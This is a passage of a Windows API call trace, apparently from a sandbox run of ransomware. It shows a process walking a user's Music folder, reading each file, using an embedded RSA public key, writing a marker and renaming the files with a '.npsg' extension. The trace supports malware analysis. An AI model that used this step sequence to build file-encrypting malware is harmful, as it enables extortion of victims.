Size=0x204) returned 0x3b90a38 [0238.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c98 | out: hHeap=0x620000) returned 1 [0238.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0238.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400cc8 | out: hHeap=0x620000) returned 1 [0238.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b947f8 [0238.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7bb78 [0238.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0238.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0238.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c38 | out: hHeap=0x620000) returned 1 [0238.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b94a10 [0238.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0238.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3b94c18 [0238.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94c18 | out: hHeap=0x620000) returned 1 [0238.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0238.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0238.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0238.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94a10 | out: hHeap=0x620000) returned 1 [0238.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0238.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0238.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c68 | out: hHeap=0x620000) returned 1 [0238.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0238.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400cb0 | out: hHeap=0x620000) returned 1 [0238.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0238.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c50 | out: hHeap=0x620000) returned 1 [0238.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c20 | out: hHeap=0x620000) returned 1 [0238.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0238.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0238.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0238.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c08 | out: hHeap=0x620000) returned 1 [0238.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b86360 | out: hHeap=0x620000) returned 1 [0238.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0238.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0238.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0238.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0238.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0238.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0238.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0238.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0238.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.984] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0xc988, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0xc988, lpOverlapped=0x0) returned 1 [0238.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0238.984] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xc98d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.984] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0238.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0238.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0238.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0238.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x346fa10 [0238.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0238.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d258 | out: hHeap=0x620000) returned 1 [0238.985] WriteFile (in: hFile=0x644, lpBuffer=0x346fa10*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x346fa10*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0238.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.985] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.985] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.985] CloseHandle (hObject=0x644) returned 1 [0238.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0238.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b88cd0 [0238.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0238.988] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\Is7zHJ.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\--nhv1eb\\is7zhj.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\Is7zHJ.m4a.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\--nhv1eb\\is7zhj.m4a.npsg")) returned 1 [0238.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88cd0 | out: hHeap=0x620000) returned 1 [0238.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.989] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0238.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0238.990] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9dbfd670, ftCreationTime.dwHighDateTime=0x1d5c14f, ftLastAccessTime.dwLowDateTime=0x4ef22ae0, ftLastAccessTime.dwHighDateTime=0x1d5b847, ftLastWriteTime.dwLowDateTime=0x4ef22ae0, ftLastWriteTime.dwHighDateTime=0x1d5b847, nFileSizeHigh=0x0, nFileSizeLow=0x3518, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Iw-8KgW.wav", cAlternateFileName="")) returned 1 [0238.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x33a87c0 [0238.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.990] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\Iw-8KgW.wav") returned=".wav" [0238.990] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\Iw-8KgW.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\--nhv1eb\\iw-8kgw.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.991] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=13592) returned 1 [0238.991] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.994] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x34f2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.994] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.996] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.996] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x3518, lpOverlapped=0x0) returned 1 [0238.997] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.997] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.997] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.997] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.998] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.998] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.998] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.998] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.998] GetLastError () returned 0x0 [0238.998] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.998] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.998] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.998] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.999] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3520) returned 0x3b88cd0 [0238.999] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0238.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0238.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0238.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0238.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86360 [0238.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c08 [0238.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b863a8 [0238.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c20 [0238.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c50 [0238.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400cb0 [0238.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c68 [0238.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0238.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0239.000] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0239.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c50 | out: hHeap=0x620000) returned 1 [0239.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c68 | out: hHeap=0x620000) returned 1 [0239.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400cb0 | out: hHeap=0x620000) returned 1 [0239.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0239.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0239.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400cb0 [0239.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0239.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400c68 [0239.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0239.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400c50 [0239.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0239.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7ba60 [0239.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0239.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0239.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0239.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7bb78 [0239.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0239.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0239.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0239.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c68 | out: hHeap=0x620000) returned 1 [0239.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0239.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c50 | out: hHeap=0x620000) returned 1 [0239.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0239.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0239.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400cb0 | out: hHeap=0x620000) returned 1 [0239.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0239.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0239.001] GetCurrentThreadId () returned 0x5b4 [0239.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0239.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b878b8 [0239.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0239.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0239.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0239.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0239.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0239.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.001] GetCurrentThreadId () returned 0x5b4 [0239.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0239.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0239.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0239.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0239.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0239.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0239.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0239.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0239.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400cb0 [0239.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0239.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0239.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0239.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0239.003] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x3518, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.003] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0239.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0239.003] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.003] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.003] CloseHandle (hObject=0x644) returned 1 [0239.005] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\Iw-8KgW.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\--nhv1eb\\iw-8kgw.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\Iw-8KgW.wav.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\--nhv1eb\\iw-8kgw.wav.npsg")) returned 1 [0239.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88cd0 | out: hHeap=0x620000) returned 1 [0239.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.006] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0239.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0239.007] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x820db770, ftCreationTime.dwHighDateTime=0x1d5c1eb, ftLastAccessTime.dwLowDateTime=0x4bed7cc0, ftLastAccessTime.dwHighDateTime=0x1d5b84f, ftLastWriteTime.dwLowDateTime=0x4bed7cc0, ftLastWriteTime.dwHighDateTime=0x1d5b84f, nFileSizeHigh=0x0, nFileSizeLow=0x15384, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ta622997O.wav", cAlternateFileName="TA6229~1.WAV")) returned 1 [0239.007] PathFindExtensionW 